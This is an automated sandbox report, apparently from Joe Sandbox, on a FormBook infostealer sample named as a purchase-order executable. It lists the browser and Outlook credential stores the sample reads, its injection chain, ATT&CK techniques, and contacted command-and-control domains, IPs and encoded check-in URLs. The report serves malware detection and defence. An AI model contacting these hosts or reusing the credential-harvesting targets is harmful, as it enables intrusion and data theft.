            Source: C:\Windows\SysWOW64\userinit.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\userinit.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 3.2.PO-000001488.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.PO-000001488.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.3308944674.0000000003080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1769630236.00000000013A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1769083261.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3308999188.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1770519170.0000000003FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3311216289.00000000055A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
            Command and Scripting Interpreter            		1
            DLL Side-Loading            		312
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		121
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism            		1
            Disable or Modify Tools            		LSASS Memory2
            Process Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		41
            Virtualization/Sandbox Evasion            		Security Account Manager41
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook312
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets2
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Abuse Elevation Control Mechanism            		Cached Domain Credentials113
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
            Obfuscated Files or Information            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
            Software Packing            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            DLL Side-Loading            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1516889 Sample: PO-000001488.exe Startdate: 24/09/2024 Architecture: WINDOWS Score: 100 30 www.suarahati20.xyz 2->30 32 yu35n.top 2->32 34 19 other IPs or domains 2->34 44 Suricata IDS alerts for network traffic 2->44 46 Malicious sample detected (through community Yara rule) 2->46 48 Antivirus / Scanner detection for submitted sample 2->48 52 7 other signatures 2->52 10 PO-000001488.exe 3 2->10         started        signatures3 50 Performs DNS queries to domains with low reputation 30->50 process4 file5 28 C:\Users\user\...\PO-000001488.exe.log, ASCII 10->28 dropped 13 PO-000001488.exe 10->13         started        process6 signatures7 64 Maps a DLL or memory area into another process 13->64 16 MpfhURuSBZcuS.exe 13->16 injected process8 signatures9 42 Found direct / indirect Syscall (likely to bypass EDR) 16->42 19 userinit.exe 13 16->19         started        process10 signatures11 54 Tries to steal Mail credentials (via file / registry access) 19->54 56 Tries to harvest and steal browser information (history, passwords, etc) 19->56 58 Modifies the context of a thread in another process (thread injection) 19->58 60 3 other signatures 19->60 22 MpfhURuSBZcuS.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 36 www.pofgof.pro 209.74.95.29, 63709, 63710, 63711 MULTIBAND-NEWHOPEUS United States 22->36 38 eslameldaramlly.site 148.251.114.233, 63705, 63706, 63707 HETZNER-ASDE Germany 22->38 40 6 other IPs or domains 22->40 62 Found direct / indirect Syscall (likely to bypass EDR) 22->62 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            PO-000001488.exe66%ReversingLabsByteCode-MSIL.Trojan.Leonem
            PO-000001488.exe100%AviraHEUR/AGEN.1308792
            PO-000001488.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.dhkatp.vip/u85y/?VX=XZGx-&L4Ml=wB3ZcmNh1MmrIwfSzb/pYDfeTUzW6O1UjWNgVadWZuGYS/WrcxHhgLOrzo8qigeYzDjwJvcv1eEC2ecO3wCLRJj3wqTQMKM05jGtzaYfnBJ5M7wMOeAqnxHMoiYb58YbsA==0%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css0%Avira URL Cloudsafe
            http://www.airtech365.net/i5ct/0%Avira URL Cloudsafe
            http://www.longfilsalphonse.net/8q1d/?L4Ml=VzkWYQIqZCqyTa6CmCFXa3qoYwUD4s1ffSppgJrtVCF0SNpQYrHA+vb9V0hsreptvR0arq5HmwRiZDuL2EbfxnsbQ7dD9aDlq4oQdTdM2Qj2g6a0bpEWwWIB7x6JldQNMQ==&VX=XZGx-0%Avira URL Cloudsafe
            http://www.suarahati20.xyz/tuad/?L4Ml=COR99YL4ij4WSzIn9uKNQTj+/nF71npMJ8PUbDDmK/MOrLSwhgHAUUFmM9ZFV75zOrifp59AeN3Qrz+fk81rYB1Esp+MUB3RCvU15TDIEUASO5KKoulUwcQsQXQ4LVDRNA==&VX=XZGx-0%Avira URL Cloudsafe
            http://www.litespeedtech.com/error-page0%Avira URL Cloudsafe
            https://htmlcodex.com0%Avira URL Cloudsafe
            https://cdn.jsdelivr.net/npm/bootstrap0%Avira URL Cloudsafe
            http://www.yu35n.top/wqu9/0%Avira URL Cloudsafe
            http://www.pofgof.pro/gfz9/?VX=XZGx-&L4Ml=DECFPtkNR+L/pYonsxrHc+WCM/VSeiNdGHXC1uiZlfELiNg401X1ACIRXYvsaPq78G/yZTFuD+bUVczsz0zGAWWWu1tjgA/c8IlwGYN4NejsTIqQyiKVQyEjdjnk1Av5Dw==0%Avira URL Cloudsafe
            http://www.eslameldaramlly.site/30vc/0%Avira URL Cloudsafe
            https://code.jquery.com/jquery-3.4.1.min.js0%Avira URL Cloudsafe
            http://www.popin.space/x7gz/?VX=XZGx-&L4Ml=S2ThdnPEL+ISgmTm3B4s3uJcp0I5cmCvGyTPO0ydqwinms1NMbmy4dx/n743DQh1PnHu901crX3LUgGJDJcuYCXFMsY6FgwTNpVrSCEqyTejsoYQywqmfZ73r7v5CbykcA==0%Avira URL Cloudsafe
            http://www.longfilsalphonse.net/8q1d/0%Avira URL Cloudsafe
            https://www.google.com0%Avira URL Cloudsafe
            https://t.me/AG099990%Avira URL Cloudsafe
            http://www.yu35n.top/wqu9/?L4Ml=dD6DvXSgWvkhkExz9ANGg62vkcZOvm8u+S0LjtafD2Cb45k+h0GLDfxxrLcTCDpid42VLL2gjPURfP6UcdvjDLDV680rGTEuq0qU4X+foBMe6t+yESiAaeFaZa7j0sbyXQ==&VX=XZGx-0%Avira URL Cloudsafe
            http://156.226.108.98:58888/0%Avira URL Cloudsafe
            https://cdn.jsdelivr.net/npm/bootstrap-icons0%Avira URL Cloudsafe
            http://www.cc101.pro/ttiz/?L4Ml=5F0OqyJMruXZK289rjd3t7SMD6PUxbvF7XqmY+a1kYOMou9z9S8lHT4vD/FoxHElV5ffXVI3IhvTCCTpyiSb8mZInZ+7lTNJSqYtQImnDDTI4Qo9BSGA+0x0XmeeIzyp/A==&VX=XZGx-0%Avira URL Cloudsafe
            http://www.donante-de-ovulos.biz/8lrv/?L4Ml=j2pAwvMmmCrYZVhkds5ZvCZgOyouEeoq6hu2s2TUPhbYOoXX99buM+wwxSBgfXcmzEpqTCVAFMCZQnQtCVeL0dRVYSRjVdr/CgjqnWXTEiabUyUwGfk/MavwiZ9OFp3FkQ==&VX=XZGx-0%Avira URL Cloudsafe
            http://www.yu35n.top0%Avira URL Cloudsafe
            http://www.airtech365.net/i5ct/?L4Ml=Fa741987AWI4ml8JbykgJhLldRSV8MLMClq6YX0bCrkU+JaoPzqjDuf6Icle9aauT7Lw6ndlbIEz9rGtX42qIZx9WxYPHsy+7TyOZv7jOElLtueXdtfrjEJRdY8SctMF/g==&VX=XZGx-0%Avira URL Cloudsafe
            http://www.popin.space/x7gz/0%Avira URL Cloudsafe
            http://www.suarahati20.xyz/tuad/0%Avira URL Cloudsafe
            http://www.dhkatp.vip/u85y/0%Avira URL Cloudsafe
            http://www.donante-de-ovulos.biz/8lrv/0%Avira URL Cloudsafe
            http://www.eslameldaramlly.site/30vc/?L4Ml=koLtGNOu6/mtotP2N90Ew8ZnZ5AtrYolTy+nHYpgZByzVo0p/pJDl5mHD5S71z13e/5SfuBUTFBQZBIfTtXqOOjASHRAzkUFzB/tE7NVhPpefWhKcPM/9ZcforBBDyLF2Q==&VX=XZGx-0%Avira URL Cloudsafe
            http://www.pofgof.pro/gfz9/0%Avira URL Cloudsafe
            https://htmlcodex.com/credit-removal0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.cc101.pro
            		188.114.97.3
            		truetrue
              		unknown
              eslameldaramlly.site
              		148.251.114.233
              		truetrue
                		unknown
                airtech365.net
                		3.33.130.190
                		truetrue
                  		unknown
                  www.longfilsalphonse.net
                  		52.223.13.41
                  		truetrue
                    		unknown
                    yu35n.top
                    		38.47.232.144
                    		truetrue
                      		unknown
                      94950.bodis.com
                      		199.59.243.227
                      		truetrue
                        		unknown
                        www.donante-de-ovulos.biz
                        		199.59.243.227
                        		truetrue
                          		unknown
                          suarahati20.xyz
                          		198.252.106.191
                          		truetrue
                            		unknown
                            www.pofgof.pro
                            		209.74.95.29
                            		truetrue
                              		unknown
                              dhkatp.vip
                              		3.33.130.190
                              		truetrue
                                		unknown
                                xzwp.g.zxy-cname.com
                                		52.187.42.58
                                		truefalse
                                  		unknown
                                  www.suarahati20.xyz
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.popin.space
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.dhkatp.vip
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.airtech365.net
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.yu35n.top
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.bonusgame2024.online
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.52ywq.vip
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.asstl.online
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.eslameldaramlly.site
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown

                                                    Contacted URLs

                                                    NameMaliciousAntivirus DetectionReputation
                                                    http://www.dhkatp.vip/u85y/?VX=XZGx-&L4Ml=wB3ZcmNh1MmrIwfSzb/pYDfeTUzW6O1UjWNgVadWZuGYS/WrcxHhgLOrzo8qigeYzDjwJvcv1eEC2ecO3wCLRJj3wqTQMKM05jGtzaYfnBJ5M7wMOeAqnxHMoiYb58YbsA==true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.airtech365.net/i5ct/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.longfilsalphonse.net/8q1d/?L4Ml=VzkWYQIqZCqyTa6CmCFXa3qoYwUD4s1ffSppgJrtVCF0SNpQYrHA+vb9V0hsreptvR0arq5HmwRiZDuL2EbfxnsbQ7dD9aDlq4oQdTdM2Qj2g6a0bpEWwWIB7x6JldQNMQ==&VX=XZGx-true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.suarahati20.xyz/tuad/?L4Ml=COR99YL4ij4WSzIn9uKNQTj+/nF71npMJ8PUbDDmK/MOrLSwhgHAUUFmM9ZFV75zOrifp59AeN3Qrz+fk81rYB1Esp+MUB3RCvU15TDIEUASO5KKoulUwcQsQXQ4LVDRNA==&VX=XZGx-true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.yu35n.top/wqu9/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.pofgof.pro/gfz9/?VX=XZGx-&L4Ml=DECFPtkNR+L/pYonsxrHc+WCM/VSeiNdGHXC1uiZlfELiNg401X1ACIRXYvsaPq78G/yZTFuD+bUVczsz0zGAWWWu1tjgA/c8IlwGYN4NejsTIqQyiKVQyEjdjnk1Av5Dw==true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.eslameldaramlly.site/30vc/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.popin.space/x7gz/?VX=XZGx-&L4Ml=S2ThdnPEL+ISgmTm3B4s3uJcp0I5cmCvGyTPO0ydqwinms1NMbmy4dx/n743DQh1PnHu901crX3LUgGJDJcuYCXFMsY6FgwTNpVrSCEqyTejsoYQywqmfZ73r7v5CbykcA==true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.longfilsalphonse.net/8q1d/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.yu35n.top/wqu9/?L4Ml=dD6DvXSgWvkhkExz9ANGg62vkcZOvm8u+S0LjtafD2Cb45k+h0GLDfxxrLcTCDpid42VLL2gjPURfP6UcdvjDLDV680rGTEuq0qU4X+foBMe6t+yESiAaeFaZa7j0sbyXQ==&VX=XZGx-true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.cc101.pro/ttiz/?L4Ml=5F0OqyJMruXZK289rjd3t7SMD6PUxbvF7XqmY+a1kYOMou9z9S8lHT4vD/FoxHElV5ffXVI3IhvTCCTpyiSb8mZInZ+7lTNJSqYtQImnDDTI4Qo9BSGA+0x0XmeeIzyp/A==&VX=XZGx-true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.donante-de-ovulos.biz/8lrv/?L4Ml=j2pAwvMmmCrYZVhkds5ZvCZgOyouEeoq6hu2s2TUPhbYOoXX99buM+wwxSBgfXcmzEpqTCVAFMCZQnQtCVeL0dRVYSRjVdr/CgjqnWXTEiabUyUwGfk/MavwiZ9OFp3FkQ==&VX=XZGx-true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.popin.space/x7gz/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.airtech365.net/i5ct/?L4Ml=Fa741987AWI4ml8JbykgJhLldRSV8MLMClq6YX0bCrkU+JaoPzqjDuf6Icle9aauT7Lw6ndlbIEz9rGtX42qIZx9WxYPHsy+7TyOZv7jOElLtueXdtfrjEJRdY8SctMF/g==&VX=XZGx-true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.suarahati20.xyz/tuad/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.dhkatp.vip/u85y/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.donante-de-ovulos.biz/8lrv/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.eslameldaramlly.site/30vc/?L4Ml=koLtGNOu6/mtotP2N90Ew8ZnZ5AtrYolTy+nHYpgZByzVo0p/pJDl5mHD5S71z13e/5SfuBUTFBQZBIfTtXqOOjASHRAzkUFzB/tE7NVhPpefWhKcPM/9ZcforBBDyLF2Q==&VX=XZGx-true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.pofgof.pro/gfz9/true
                                                    • Avira URL Cloud: safe
                                                    		unknown

                                                    URLs from Memory and Binaries

                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                    https://htmlcodex.comuserinit.exe, 00000008.00000002.3309629931.0000000004670000.00000004.10000000.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000009.00000002.3309095890.0000000003EC0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://duckduckgo.com/chrome_newtabuserinit.exe, 00000008.00000002.3312021634.0000000007D38000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://duckduckgo.com/ac/?q=userinit.exe, 00000008.00000002.3312021634.0000000007D38000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://cdn.jsdelivr.net/npm/bootstrapuserinit.exe, 00000008.00000002.3309629931.0000000004670000.00000004.10000000.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000009.00000002.3309095890.0000000003EC0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.cssuserinit.exe, 00000008.00000002.3309629931.0000000004670000.00000004.10000000.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000009.00000002.3309095890.0000000003EC0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.litespeedtech.com/error-pageuserinit.exe, 00000008.00000002.3309629931.00000000044DE000.00000004.10000000.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000009.00000002.3309095890.0000000003D2E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=userinit.exe, 00000008.00000002.3312021634.0000000007D38000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=userinit.exe, 00000008.00000002.3312021634.0000000007D38000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://code.jquery.com/jquery-3.4.1.min.jsuserinit.exe, 00000008.00000002.3309629931.0000000004670000.00000004.10000000.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000009.00000002.3309095890.0000000003EC0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.ecosia.org/newtab/userinit.exe, 00000008.00000002.3312021634.0000000007D38000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://156.226.108.98:58888/userinit.exe, 00000008.00000002.3311803210.00000000061C0000.00000004.00000800.00020000.00000000.sdmp, userinit.exe, 00000008.00000002.3309629931.0000000003E96000.00000004.10000000.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000009.00000002.3309095890.00000000036E6000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2107922191.0000000038536000.00000004.80000000.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://cdn.jsdelivr.net/npm/bootstrap-iconsuserinit.exe, 00000008.00000002.3309629931.0000000004670000.00000004.10000000.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000009.00000002.3309095890.0000000003EC0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://ac.ecosia.org/autocomplete?q=userinit.exe, 00000008.00000002.3312021634.0000000007D38000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://www.google.comuserinit.exe, 00000008.00000002.3309629931.0000000004028000.00000004.10000000.00040000.00000000.sdmp, userinit.exe, 00000008.00000002.3311803210.00000000061C0000.00000004.00000800.00020000.00000000.sdmp, userinit.exe, 00000008.00000002.3309629931.0000000004802000.00000004.10000000.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000009.00000002.3309095890.0000000003878000.00000004.00000001.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000009.00000002.3309095890.0000000004052000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchuserinit.exe, 00000008.00000002.3312021634.0000000007D38000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://t.me/AG09999userinit.exe, 00000008.00000002.3309629931.0000000003E96000.00000004.10000000.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000009.00000002.3309095890.00000000036E6000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2107922191.0000000038536000.00000004.80000000.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.yu35n.topMpfhURuSBZcuS.exe, 00000009.00000002.3311216289.000000000561B000.00000040.80000000.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://htmlcodex.com/credit-removaluserinit.exe, 00000008.00000002.3309629931.0000000004670000.00000004.10000000.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000009.00000002.3309095890.0000000003EC0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=userinit.exe, 00000008.00000002.3312021634.0000000007D38000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown

                                                    World Map of Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public IPs

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    209.74.95.29
                                                    		www.pofgof.proUnited States
                                                    		31744MULTIBAND-NEWHOPEUStrue
                                                    188.114.97.3
                                                    		www.cc101.proEuropean Union
                                                    		13335CLOUDFLARENETUStrue
                                                    198.252.106.191
                                                    		suarahati20.xyzCanada
                                                    		20068HAWKHOSTCAtrue
                                                    199.59.243.227
                                                    		94950.bodis.comUnited States
                                                    		395082BODIS-NJUStrue
                                                    52.223.13.41
                                                    		www.longfilsalphonse.netUnited States
                                                    		8987AMAZONEXPANSIONGBtrue
                                                    38.47.232.144
                                                    		yu35n.topUnited States
                                                    		174COGENT-174UStrue
                                                    3.33.130.190
                                                    		airtech365.netUnited States
                                                    		8987AMAZONEXPANSIONGBtrue
                                                    148.251.114.233
                                                    		eslameldaramlly.siteGermany
                                                    		24940HETZNER-ASDEtrue

                                                    General Information

                                                    Joe Sandbox version:41.0.0 Charoite
                                                    Analysis ID:1516889
                                                    Start date and time:2024-09-24 17:15:29 +02:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 10m 15s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Run name:Run with higher sleep bypass
                                                    Number of analysed new started processes analysed:12
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:2
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:PO-000001488.exe
                                                    Detection:MAL
                                                    Classification:mal100.troj.spyw.evad.winEXE@7/2@13/8
                                                    EGA Information:
                                                    • Successful, ratio: 75%
                                                    HCA Information:
                                                    • Successful, ratio: 96%
                                                    • Number of executed functions: 98
                                                    • Number of non-executed functions: 291
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe
                                                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                    Warnings

                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                    • Execution Graph export aborted for target MpfhURuSBZcuS.exe, PID 5996 because it is empty
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                    • VT rate limit hit for: PO-000001488.exe

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    11:17:36API Interceptor5851615x Sleep call for process: userinit.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    209.74.95.29List of Items0001.doc.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • www.onetoph.xyz/h5ax/
                                                    PO2024033194.exeGet hashmaliciousFormBookBrowse
                                                    • www.sterkus.xyz/ha8h/
                                                    PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                    • www.pofgof.pro/gfz9/
                                                    188.114.97.3QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • filetransfer.io/data-package/13rSMZZi/download
                                                    Purchase Order_ AEPL-2324-1126.exeGet hashmaliciousFormBookBrowse
                                                    • www.rtpngk.xyz/yhsl/
                                                    PO-001.exeGet hashmaliciousFormBookBrowse
                                                    • www.x0x9x8x8x7x6.shop/assb/
                                                    PO2024033194.exeGet hashmaliciousFormBookBrowse
                                                    • www.cc101.pro/4hfb/
                                                    ADNOC REQUESTS & reviews.exeGet hashmaliciousFormBookBrowse
                                                    • www.chinaen.org/zi4g/
                                                    updater.exeGet hashmaliciousUnknownBrowse
                                                    • microsoft-rage.world/Api/v3
                                                    http://www.pro-pharma.co.ukGet hashmaliciousUnknownBrowse
                                                    • proph.co.uk/blog/
                                                    DHL documents_PDF.exeGet hashmaliciousFormBookBrowse
                                                    • www.hindo.top/b31a/?xVJtG4Qx=NzSChTKNjjtA9oOpLl4rXJIvEV3PrPKyZnQBhjSYE3dzUwTxd/TkmyQCL+Cn4jVtP9cc&9rT=ndrxUr
                                                    PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                                                    • www.chinaen.org/mquw/
                                                    QUOTATION_AUGQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                    • filetransfer.io/data-package/TX2daF45/download
                                                    198.252.106.191PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
